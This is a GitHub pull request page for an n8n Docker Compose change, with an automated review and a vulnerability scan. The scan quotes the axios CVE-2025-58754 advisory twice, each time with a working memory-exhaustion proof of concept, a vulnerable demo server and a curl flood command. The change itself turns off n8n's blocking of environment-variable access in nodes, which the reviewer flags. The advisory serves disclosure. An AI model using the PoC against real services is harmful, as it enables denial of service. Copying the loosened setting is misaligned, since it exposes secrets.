Conversation

@SashkoMarchuk SashkoMarchuk commented Sep 17, 2025

Summary by CodeRabbit

  • New Features

    • Enabled persistent n8n data storage in production via a mounted volume.
    • Allowed environment variable access within n8n nodes by default to improve workflow flexibility.
  • Chores

    • Simplified environment configuration by removing an obsolete allowlist variable in production settings.
    • Updated default environment settings to align development and production behavior.

…to Docker Compose files

- Add N8N_BLOCK_ENV_ACCESS_IN_NODE=true to docker-compose.yml for enhanced security
- Add N8N_ENV_ACCESS_ALLOWED with ASSEMBLY_USER and ASSEMBLY_PASS to docker-compose.prod.yml
- Add ASSEMBLY_USER and ASSEMBLY_PASS environment variables to both compose files
…nodes

- Remove invalid N8N_ENV_ACCESS_ALLOWED configuration from docker-compose.prod.yml
- Set N8N_BLOCK_ENV_ACCESS_IN_NODE=false in docker-compose.yml to allow environment variable access in nodes
@SashkoMarchuk SashkoMarchuk self-assigned this Sep 17, 2025

coderabbitai bot commented Sep 17, 2025

Walkthrough

Updated n8n configuration in Docker Compose files: removed N8N_ENV_ACCESS_ALLOWED from production, changed N8N_BLOCK_ENV_ACCESS_IN_NODE from true to false in default compose, and added a persistent volume mount n8n_data:/data/n8n in the production compose.

Changes

• n8n environment access policy (docker-compose.yml, docker-compose.prod.yml): docker-compose.yml sets N8N_BLOCK_ENV_ACCESS_IN_NODE=false and removes its explanatory comment; docker-compose.prod.yml removes N8N_ENV_ACCESS_ALLOWED.
• Production persistent storage (docker-compose.prod.yml): adds a volume to the n8n service: n8n_data:/data/n8n.
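
A minimal sketch of what the resulting compose entries could look like (service and volume layout inferred from this summary; the actual files may differ):

# docker-compose.yml, sketch of the toggled setting
services:
  n8n:
    environment:
      - N8N_BLOCK_ENV_ACCESS_IN_NODE=false  # nodes may read environment variables

# docker-compose.prod.yml, sketch of the added persistent mount
services:
  n8n:
    volumes:
      - n8n_data:/data/n8n
volumes:
  n8n_data: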

Estimated code review effort

🎯 2 (Simple) | ⏱️ ~10 minutes

Possibly related PRs

Suggested reviewers

  • killev
  • DenisChistyakov

Poem

Hop hop! I tweak the envs with care,
A volume burrowed here, persistent lair.
Blockers flipped, a toggle’s grace—
Containers hum in tidy space.
N8N nods, configs align,
Carrots committed, pipelines fine. 🥕🐇

Pre-merge checks and finishing touches

✅ Passed checks (3 passed)
• Description Check: ✅ Passed. Check skipped; CodeRabbit's high-level summary is enabled.
• Title Check: ✅ Passed. The PR title "Feat/security env vars config" succinctly and accurately reflects the main changes, which focus on environment-variable security configuration (toggling N8N_BLOCK_ENV_ACCESS_IN_NODE and removing N8N_ENV_ACCESS_ALLOWED) and related docker-compose adjustments; it is concise, specific, and aligned with the branch name and PR objectives.
• Docstring Coverage: ✅ Passed. No functions found in the changes; docstring coverage check skipped.


…ironment configuration

- Updated the npm install command to install packages directly into n8n's app directory, enhancing organization and ownership management.
- Replaced N8N_EXTERNAL_MODULES_ALLOWLIST with NODE_FUNCTION_ALLOW_EXTERNAL for better clarity in external module configuration.

These changes streamline the Docker build process and improve the overall setup for the n8n service.
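
For context, a minimal sketch of how NODE_FUNCTION_ALLOW_EXTERNAL is typically wired into a compose file (the module names are placeholders, not taken from this PR):

services:
  n8n:
    environment:
      # comma-separated allowlist of npm modules that Code/Function nodes may require()
      - NODE_FUNCTION_ALLOW_EXTERNAL=lodash,moment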


github-actions bot commented Sep 17, 2025

🔍 Vulnerabilities of n8n-test:latest

📦 Image Reference: n8n-test:latest
digest: sha256:0d42ca4f40c825d9c5ce19ae7695967036c86e6ed58db88609d4547f1f22c145
vulnerabilities: critical: 0, high: 3, medium: 0, low: 0
platform: linux/amd64
size: 335 MB
packages: 1844
📦 Base Image: node:22-alpine
also known as
  • 22-alpine3.22
  • 22.19-alpine
  • 22.19-alpine3.22
  • 22.19.0-alpine
  • 22.19.0-alpine3.22
  • jod-alpine
  • jod-alpine3.22
  • lts-alpine
  • lts-alpine3.22
digest: sha256:704b199e36b5c1bc505da773f742299dc1ee5a4c70b86d1eb406c334f63253c6
vulnerabilities: critical: 0, high: 0, medium: 0, low: 2
axios 1.8.3 (npm): critical: 0, high: 1, medium: 0, low: 0

pkg:npm/axios@1.8.3

high 7.5: CVE-2025-58754 Allocation of Resources Without Limits or Throttling

Affected range: <1.12.0
Fixed version: 1.12.0
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.013%
EPSS Percentile: 1st percentile
Description

Summary

When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform an HTTP request. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.

Details

The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.

Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):

const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;
  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }
  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });
  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}

The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):

export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
  • The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
  • It does not honour config.maxContentLength or config.maxBodyLength, which only apply to HTTP streams.
  • As a result, a data: URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size: the HTTP adapter accumulates the response into a buffer and rejects once totalResponseBytes exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs.

PoC

const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;

  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });

  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});

Run with limited heap to force a crash:

node --max-old-space-size=100 poc.js

Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…

Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It accepts data: URLs, for which axios ignores maxContentLength and maxBodyLength and fully decodes the payload into memory on Node before streaming, enabling DoS.

import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent, httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req,res)=>res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */

app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

  // Developer allows using data:// in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;

  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
      else { sent += chunk.length; limiter.write(chunk); }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});

Run this app and send three POST requests in parallel:

# set URL to the app's preview endpoint, e.g. URL=http://127.0.0.1:8081/preview
SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null

Suggestions

  1. Enforce size limits
    For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit.

  2. Stream decoding
    Instead of decoding the entire payload in one Buffer.from call, decode the Base64 string in chunks using a streaming Base64 decoder. This would allow the application to process the data incrementally and abort if it grows too large.
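
A caller-side sketch of suggestion 1: estimate the decoded size from the encoded payload length and refuse oversized data: URIs before axios ever sees them. The helper name and the limit are illustrative, not part of axios (the upstream fix landed in 1.12.0):

// Hypothetical guard: base64 decodes to roughly 3/4 of its encoded length.
function assertDataUriWithinLimit(uri, maxBytes) {
  const comma = uri.indexOf(',');
  if (comma === -1) throw new Error('malformed data: URI');
  const isBase64 = /;base64$/i.test(uri.slice(0, comma));
  const payloadLength = uri.length - comma - 1;
  const estimatedBytes = isBase64 ? Math.ceil(payloadLength * 3 / 4) : payloadLength;
  if (estimatedBytes > maxBytes) {
    throw new Error(`data: URI payload ~${estimatedBytes} bytes exceeds limit of ${maxBytes}`);
  }
}

// Usage sketch: throws instead of allocating the decoded buffer.
const uri = 'data:application/octet-stream;base64,' + 'A'.repeat(200_000);
assertDataUriWithinLimit(uri, 8 * 1024); // Error: ~150000 bytes exceeds limit of 8192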

axios 1.11.0 (npm): critical: 0, high: 1, medium: 0, low: 0

pkg:npm/axios@1.11.0

high 7.5: CVE-2025-58754 Allocation of Resources Without Limits or Throttling

Affected range: <1.12.0
Fixed version: 1.12.0
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.013%
EPSS Percentile: 1st percentile
Description

The advisory text is identical to the axios 1.8.3 entry above (same summary, details, PoC, and suggestions); only the affected package version differs.

openssh 10.0_p1-r7 (apk): critical: 0, high: 1, medium: 0, low: 0

pkg:apk/alpine/openssh@10.0_p1-r7?os_name=alpine&os_version=3.22

high: CVE-2023-51767

Affected range: <=10.0_p1-r7
Fixed version: Not Fixed
EPSS Score: 0.012%
EPSS Percentile: 1st percentile
Description


@coderabbitai coderabbitai bot left a comment


Actionable comments posted: 3

Caution

Some comments are outside the diff and can’t be posted inline due to platform limitations.

⚠️ Outside diff range comments (1)
docker-compose.prod.yml (1)

7-15: Harden prod: explicitly block env access in nodes.

Because docker-compose.prod.yml doesn't override the N8N_BLOCK_ENV_ACCESS_IN_NODE=false set in docker-compose.yml, env access would remain allowed in production after merge. Set it to true here. (docs.n8n.io)

       - N8N_SMTP_TLS=${N8N_SMTP_TLS:-true}
+      - N8N_BLOCK_ENV_ACCESS_IN_NODE=true

Also applies to: 21-25, 27-28

🧹 Nitpick comments (1)
docker-compose.prod.yml (1)

112-119: Align volume persistence with repo standards.

Bind the n8n_data volume to a local ./volumes/n8n_data directory (tracked/backed up consistently with other services), instead of a host-absolute /data/n8n path. [Policy: volumes/**/* should live under ./volumes/]

 volumes:
   n8n_data:
-    driver: local
-    driver_opts:
-      type: none
-      o: bind
-      device: /data/n8n
+    driver: local
+    driver_opts:
+      type: none
+      o: bind
+      device: ./volumes/n8n_data
📜 Review details

Configuration used: Path: .coderabbit.yml

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between f86b525 and e5d08eb.

📒 Files selected for processing (2)
  • docker-compose.prod.yml (1 hunks)
  • docker-compose.yml (1 hunks)
🧰 Additional context used
📓 Path-based instructions (1)
docker-compose.yml

📄 CodeRabbit inference engine (.cursor/rules/docker-configuration.mdc)

docker-compose.yml: All service configurations, including service dependencies, volume mounts, network configuration, environment variables, and port mappings, must be defined in docker-compose.yml
Services must communicate over an internal Docker network with only the specified ports exposed: n8n (5678), Temporal (7233), Temporal UI (8080), PostgreSQL (5432), and OpenSearch (9200)

The repository must include a docker-compose.yml file as the main service orchestration configuration.

Use docker compose up -d to start all services

Files:

  • docker-compose.yml
🧠 Learnings (2)
📓 Common learnings
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/project-structure.mdc:0-0
Timestamp: 2025-07-28T16:44:50.073Z
Learning: Applies to Dockerfile.n8n : Use Dockerfile.n8n for custom n8n image configuration.
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/docker-configuration.mdc:0-0
Timestamp: 2025-07-28T16:44:24.081Z
Learning: Applies to docker-compose.yml : Services must communicate over an internal Docker network with only the specified ports exposed: n8n (5678), Temporal (7233), Temporal UI (8080), PostgreSQL (5432), and OpenSearch (9200)
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/docker-configuration.mdc:0-0
Timestamp: 2025-07-28T16:44:24.081Z
Learning: Applies to volumes/**/* : All service data must be persisted in Docker volumes mapped to the local volumes/ directory, such as ./volumes/n8n_data, ./volumes/opensearch-data, and ./volumes/postgresql-data
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/project-structure.mdc:0-0
Timestamp: 2025-07-28T16:44:50.073Z
Learning: Applies to volumes/{n8n_data,opensearch-data,postgresql-data}/ : Persistent data for all services must be stored in the volumes/ directory, with subdirectories for n8n_data, opensearch-data, and postgresql-data.
📚 Learning: 2025-07-28T16:44:24.081Z
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/docker-configuration.mdc:0-0
Timestamp: 2025-07-28T16:44:24.081Z
Learning: Applies to docker-compose.yml : Services must communicate over an internal Docker network with only the specified ports exposed: n8n (5678), Temporal (7233), Temporal UI (8080), PostgreSQL (5432), and OpenSearch (9200)

Applied to files:

  • docker-compose.prod.yml
⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (2)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check

@SashkoMarchuk SashkoMarchuk merged commit f98c1f0 into main Sep 17, 2025
12 checks passed
@SashkoMarchuk SashkoMarchuk deleted the feat/security-env-vars-config branch September 17, 2025 21:02